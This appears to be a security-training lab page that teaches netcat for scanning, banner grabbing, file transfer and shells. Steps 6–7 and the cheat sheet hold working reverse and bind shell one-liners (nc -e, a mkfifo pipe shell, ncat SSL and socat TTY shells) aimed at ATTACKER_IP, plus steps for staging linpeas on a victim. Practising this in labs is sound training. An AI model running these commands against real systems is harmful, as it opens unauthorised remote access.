๐ŸŽฏ Lab Objectives

  • Understand what netcat does and why every hacker needs it
  • Use nc for port scanning and banner grabbing
  • Transfer files between machines using nc
  • Set up a listener and catch reverse shells
๐Ÿ‘ถ
Think of netcat as a raw network pipe. It can connect to or listen on any TCP/UDP port and pass data through โ€” making it useful for practically everything in networking and security.

Step 1 โ€” What is Netcat?

# Check netcat version on Kali
nc --version
nc -h

# Two main modes:
# CLIENT: nc [IP] [PORT]  โ†’ connect to something
# SERVER: nc -l -p [PORT] โ†’ listen for connections

# Two common versions:
# Traditional nc (netcat-traditional) โ†’ has -e flag
# OpenBSD nc                           โ†’ no -e flag (safer)
# ncat (from nmap project)             โ†’ supports SSL, IPv6

Step 2 โ€” Port Scanning

# Scan a single port
nc -zv 192.168.1.1 80

# Scan a range of ports
nc -zv 192.168.1.1 20-1000

# Scan UDP ports
nc -zvu 192.168.1.1 53

# Flags:
# -z โ†’ zero I/O mode (just scan, don't send data)
# -v โ†’ verbose (shows open/closed)
# -u โ†’ UDP mode
# -w 1 โ†’ timeout after 1 second

# Quick scan with timeout
nc -zv -w 1 192.168.1.1 1-1024 2>&1 | grep succeeded

Step 3 โ€” Banner Grabbing

# Connect and see what the service says
nc 192.168.1.1 22    # SSH banner
nc 192.168.1.1 21    # FTP banner
nc 192.168.1.1 25    # SMTP banner

# Manual HTTP request
nc 192.168.1.1 80
GET / HTTP/1.0
Host: 192.168.1.1
(press Enter twice)

# The response will include the Server header:
# Server: Apache/2.4.41 (Ubuntu)

# SMTP banner grab
nc mail.example.com 25
EHLO test
(this reveals the mail server software and version)

Step 4 โ€” Chat / Listener

# Simple two-machine chat
# Machine A โ€” listen
nc -lvnp 1234

# Machine B โ€” connect
nc 192.168.1.10 1234

# Now anything typed on either side appears on the other

# Keep listener open after disconnect (for catching multiple shells)
while true; do nc -lvnp 4444; done

Step 5 โ€” File Transfer

# Send a file from attacker to victim
# Receiver first:
nc -lvnp 9999 > received_file.txt

# Sender:
nc 192.168.1.10 9999 < file_to_send.txt

# Transfer a directory (with tar)
# Receiver:
nc -lvnp 9999 | tar xvf -

# Sender:
tar cvf - /path/to/dir | nc 192.168.1.10 9999

# Transfer a binary (linpeas, tools etc.)
# On Kali (sender):
nc -lvnp 8080 < /usr/share/peass/linpeas.sh

# On victim (receiver):
nc KALI_IP 8080 > linpeas.sh && chmod +x linpeas.sh

Step 6 โ€” Bind & Reverse Shells

# Reverse shell โ€” victim connects to attacker
# Attacker listens:
nc -lvnp 4444

# Victim connects back (needs nc with -e flag):
nc ATTACKER_IP 4444 -e /bin/bash

# Bind shell โ€” attacker connects to victim
# Victim opens shell on a port:
nc -lvnp 4444 -e /bin/bash

# Attacker connects:
nc VICTIM_IP 4444

# If nc doesn't have -e (OpenBSD version):
rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc ATTACKER_IP 4444 > /tmp/f

Step 7 โ€” Ncat & Socat

# ncat โ€” nmap's modern netcat with SSL support
# Encrypted listener
ncat --ssl -lvnp 4444

# Encrypted reverse shell
ncat --ssl ATTACKER_IP 4444 -e /bin/bash

# Allow multiple connections
ncat -lvnp 4444 --keep-open

# socat โ€” more powerful than netcat
# Full TTY reverse shell (best shell quality)
# Attacker:
socat file:`tty`,raw,echo=0 tcp-listen:4444

# Victim:
socat tcp-connect:ATTACKER_IP:4444 exec:bash,pty,stderr,setsid,sigint,sane

๐Ÿ“‹ Netcat Cheat Sheet

TaskCommand
Listen on portnc -lvnp 4444
Connect to portnc 192.168.1.1 80
Port scannc -zv 192.168.1.1 1-1000
Send filenc TARGET 9999 < file.txt
Receive filenc -lvnp 9999 > file.txt
Reverse shell (catch)nc -lvnp 4444
Bind shell (connect)nc VICTIM 4444
Pipe shellrm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc IP 4444 >/tmp/f
โœ…
Lab Complete! Netcat is in almost every CTF solution and pentest report. Practice using it daily until it feels natural.
Next: Reverse Shells โ†’ โ† All Labs
// guided terminal

Try It Live

Type the commands from the steps above. The terminal simulates the expected output for this lab.

KaliRange ~ Terminal type help for commands